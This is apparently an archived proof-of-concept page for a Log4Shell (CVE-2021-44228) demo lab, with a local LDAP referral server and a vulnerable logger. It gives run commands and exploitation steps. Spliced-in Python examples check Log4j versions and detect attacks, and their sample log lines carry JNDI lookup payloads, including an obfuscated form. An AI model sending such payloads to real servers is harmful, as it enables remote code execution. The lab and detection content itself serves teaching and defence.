POC details: 2b17bc618700351d3eabe460573504f27278cca8

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
CVE-2021-44228 demo webapp
Introduction
# CVE-2021-44228-POC
Yet another CVE-2021-44228 POC

Affected Log4j versions: from 2.0-beta9 up to 2.14.1
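The affected range above is inclusive at both ends and includes the 2.0 pre-release qualifiers (beta, rc), which a plain string comparison gets wrong. The following is an added example, not code from this repository, that parses Log4j 2 version strings with their qualifiers, checks them against the range the README states, and scans a Maven `pom.xml` for a `log4j-core` dependency (resolving a one-level `${property}` reference). The sample POM is constructed inline for the demonstration; the range is taken as given here, so builds on later releases that received their own advisories are not covered by this check.

```python
"""Check Log4j 2 version strings and a Maven pom.xml against the 2.0-beta9 .. 2.14.1 range."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

POM_NS_URI = "http://maven.apache.org/POM/4.0.0"
POM_NS = {"m": POM_NS_URI}

# Log4j 2 version strings look like 2.0-beta9, 2.0-rc1, 2.0, 2.14.1.
VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)
# Pre-release qualifiers sort before the final release of the same number.
QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2, "": 3}


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '2.0-beta9' into a tuple that compares in release order."""
    m = VERSION_RE.match(text.strip())
    if m is None:
        raise ValueError(f"unrecognised Log4j version string: {text!r}")
    major, minor, patch, qual, qnum = m.groups()
    return (int(major), int(minor), int(patch or 0),
            QUALIFIER_RANK[(qual or "").lower()], int(qnum or 0))


# Range given in the README: from 2.0-beta9 up to 2.14.1, both inclusive.
AFFECTED_FROM = parse_version("2.0-beta9")
AFFECTED_TO = parse_version("2.14.1")


def is_affected(version: str) -> bool:
    return AFFECTED_FROM <= parse_version(version) <= AFFECTED_TO


def resolve_property(value: str, properties: Dict[str, str]) -> str:
    """Resolve a <version>${log4j.version}</version> style reference (one level)."""
    m = re.fullmatch(r"\$\{([^}]+)\}", value.strip())
    if m and m.group(1) in properties:
        return properties[m.group(1)].strip()
    return value.strip()


def scan_pom(pom_xml: str) -> List[Tuple[str, str, bool]]:
    """Return (artifactId, resolved version, affected?) for every log4j-core dependency."""
    root = ET.fromstring(pom_xml)
    props = {p.tag.rsplit("}", 1)[-1]: (p.text or "")
             for p in root.findall("m:properties/*", POM_NS)}
    findings = []
    for dep in root.iter(f"{{{POM_NS_URI}}}dependency"):
        group = dep.findtext("m:groupId", "", POM_NS)
        artifact = dep.findtext("m:artifactId", "", POM_NS)
        version = dep.findtext("m:version", "", POM_NS)
        if group != "org.apache.logging.log4j" or artifact != "log4j-core":
            continue
        version = resolve_property(version, props)
        findings.append((artifact, version, is_affected(version)))
    return findings


# Constructed sample POM (not the repository's own pom.xml) pinning log4j-core via a property.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    for artifact, version, affected in scan_pom(SAMPLE_POM):
        print(f"{artifact} {version}: {'AFFECTED' if affected else 'not in range'}")
```

Only `log4j-core` is reported because that artifact carries the lookup code; `log4j-api` on its own does not make a build vulnerable. Transitive dependencies are not visible in a single POM, so for a real audit run the same range check over the output of `mvn dependency:tree` or over the jar names actually shipped.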

## Prerequisites 

Java used: OpenJDK 11
 - https://jdk.java.net/archive/

Maven is required to build the apps in this repo (alternatively, download the prebuilt jar files from the release):
 - https://maven.apache.org/

## Building & Running the projects 

Directories description: 
 - jndi - project with JNDI LDAP Reference server
 - web - project with vulnerable server
 - provider - project with code compiler & server
 - resources - directory for additional resources (like screenshots)

Build projects with: 
```
mvn clean install
```

Run jars with:
```
java -jar <jar>
```

Files to run (generated in `<repo_name>/<project_name>/target`):
 - jndi-1.0.0-jar-with-dependencies.jar (run with: `java -jar jndi-1.0.0-jar-with-dependencies.jar "http://127.0.0.1:8081/#Exploit"`)
 - web-1.0.0.jar (run with: `java -jar web-1.0.0.jar`) - runs on port 8080
 - provider-1.0.0.jar (run with: `java -jar provider-1.0.0.jar`) - runs on port 8081

***Alternatively, build and run the Docker image (see the Docker section below Screenshots)***

## Basic usage

0. Start all projects (as above)
1. Go to http://127.0.0.1:8081/
2. Copy the exploit template and paste it into the Java Code box
3. Go to the vulnerable logger at: http://127.0.0.1:8080/
4. Copy the payload from the example and send it to the logger
5. The Calculator app should open (Windows). On Linux and macOS, an empty file named "PWNED" should be created in the /tmp directory

## Description

Currently, the vulnerability can be exploited via:
 - */logAction* -> POST endpoint (triggers with a payload in the request headers or in the "payload" param)
 - */logGetHeaders* -> GET endpoint (triggers with request headers)
 - */logPut* -> PUT endpoint (triggers with request headers or the request body)
 - */logDelete* -> DELETE endpoint (triggers with request headers or the request body)
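Every one of the endpoints above is triggered the same way: user-controlled text (a header, a parameter, a body) reaches a log statement unchanged, and Log4j resolves the `${...}` lookup inside it. That makes the access log and the application log the place to look for attempts, and it also means a detector must flatten Log4j's nested lookups before matching, because a lookup string can be assembled from inner `${lower:...}`, `${upper:...}` or `${x:-default}` expressions at log time. The block below is an added example, not code from this repository: it normalizes those inner lookups and then flags any line containing a `${jndi:` lookup. The log lines are constructed for the demonstration (the LDAP port 1389 is an assumed value, not taken from the README).

```python
"""Flag log lines that carry a Log4j JNDI lookup, after flattening nested lookups."""
import re
from typing import List, Tuple

# ${lower:x}, ${upper:x} and the default-value form ${anything:-x} all evaluate
# to x before the surrounding lookup is resolved, so replace them with x.
INNER_LOOKUP_RE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE
)
# The outer lookup that hands the resolved string to JNDI.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse inner lookups; bounded so malformed input cannot loop."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def find_jndi(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, original line) for every line with a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        if JNDI_RE.search(normalize(line)):
            hits.append((number, line))
    return hits


# Constructed access-log lines in combined format, with the User-Agent field last.
SAMPLE_LINES = [
    '127.0.0.1 - - [10/Dec/2021:12:00:01 +0000] "GET /logGetHeaders HTTP/1.1" 200 12 "-" '
    '"${jndi:ldap://127.0.0.1:1389/Exploit}"',
    '127.0.0.1 - - [10/Dec/2021:12:00:02 +0000] "GET /logGetHeaders HTTP/1.1" 200 12 "-" '
    '"Mozilla/5.0"',
    '127.0.0.1 - - [10/Dec/2021:12:00:03 +0000] "POST /logAction HTTP/1.1" 200 12 "-" '
    '"${${lower:j}ndi:ldap://127.0.0.1:1389/Exploit}"',
    '127.0.0.1 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 945 "-" '
    '"curl/7.68.0 ${date:yyyy}"',
]

if __name__ == "__main__":
    for number, line in find_jndi(SAMPLE_LINES):
        print(f"line {number}: {line}")
```

Line 3 is only caught because `normalize` runs first; a plain search for the literal `${jndi:` would miss it. Line 4 shows that an unrelated lookup such as `${date:yyyy}` is not reported. A match here is evidence of an attempt, not of success: confirm impact from the application side (outbound LDAP/RMI connections from the JVM, the files or processes the README describes as the demo's effect), and treat the fix as upgrading `log4j-core` rather than filtering strings at the edge.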

## Screenshots 

Java version:\
![Java version image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/javaVer.png)

Exploit preparation + Compilation + Serving class file:\
![Exploit preparation image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/provider.png)

Payload (to be delivered to log4j) preparation + Sending the payload:\
![Payload image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/web.png)

JNDI Reference:\
![JNDI Reference image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/jndiRef.png)

Exploitation result (Windows):\
![Exploitation result (win) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_win.png)

Exploitation result (GNU/Linux):\
![Exploitation result (lin) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_lin.png)

## Docker

You can also build a Docker image from the Dockerfile in the repository's root directory.
Instructions:
```
docker build . -t log4j_vuln
docker run -p 8080:8080 -p 8081:8081 log4j_vuln
```

To find CONTAINER_ID: 
```
docker ps
```

To see exploitation result (inside container):
```
docker exec -it <CONTAINER_ID> bash
ls -la /tmp
```

Kill docker container with: 
```
docker container kill <CONTAINER_ID>
```

## Disclaimer

Code presented in this repository is intended to be used **FOR EDUCATIONAL PURPOSES ONLY**.\
I do not aid or endorse any malicious use of material from this repository.

Additionally, code in this repository is shared on an 'AS IS' BASIS - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.

## More information

https://www.lunasec.io/docs/blog/log4j-zero-day/
File snapshot

```
[4.0K] /data/pocs/2b17bc618700351d3eabe460573504f27278cca8
├── [ 729] Dockerfile
├── [4.0K] jndi
│   ├── [1.4K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] jndi
│                       └── [4.0K] serv
│                           ├── [2.7K] LDAPServer.java
│                           └── [2.8K] OperationInterceptor.java
├── [4.0K] provider
│   ├── [1.3K] pom.xml
│   └── [4.0K] src
│       ├── [4.0K] main
│       │   ├── [4.0K] java
│       │   │   └── [4.0K] com
│       │   │       └── [4.0K] code
│       │   │           └── [4.0K] provider
│       │   │               ├── [ 280] BaseController.java
│       │   │               ├── [1.8K] BaseRestController.java
│       │   │               ├── [ 422] Compiler.java
│       │   │               ├── [1.3K] FileService.java
│       │   │               └── [ 314] ProviderApplication.java
│       │   └── [4.0K] resources
│       │       ├── [  17] application.properties
│       │       └── [4.0K] templates
│       │           └── [1.6K] index.html
│       └── [4.0K] test
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] code
│                       └── [4.0K] provider
│                           └── [ 211] ProviderApplicationTests.java
├── [3.6K] README.md
├── [4.0K] resources
│   ├── [4.0K] docker
│   │   └── [ 183] startup.sh
│   └── [4.0K] screenshots
│       ├── [ 21K] exploitation_lin.png
│       ├── [148K] exploitation_win.png
│       ├── [5.1K] javaVer.png
│       ├── [3.8K] jndiRef.png
│       ├── [ 59K] provider.png
│       └── [ 13K] web.png
└── [4.0K] web
    ├── [1.8K] pom.xml
    └── [4.0K] src
        ├── [4.0K] main
        │   ├── [4.0K] java
        │   │   └── [4.0K] com
        │   │       └── [4.0K] log4shell
        │   │           └── [4.0K] web
        │   │               ├── [ 281] BaseController.java
        │   │               ├── [2.0K] LogController.java
        │   │               └── [ 304] WebApplication.java
        │   └── [4.0K] resources
        │       ├── [   1] application.properties
        │       └── [4.0K] templates
        │           └── [ 945] index.html
        └── [4.0K] test
            └── [4.0K] java
                └── [4.0K] com
                    └── [4.0K] log4shell
                        └── [4.0K] web
                            └── [ 206] WebApplicationTests.java

38 directories, 28 files
```
Notes
    1. It is recommended to access the POC through the source link first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.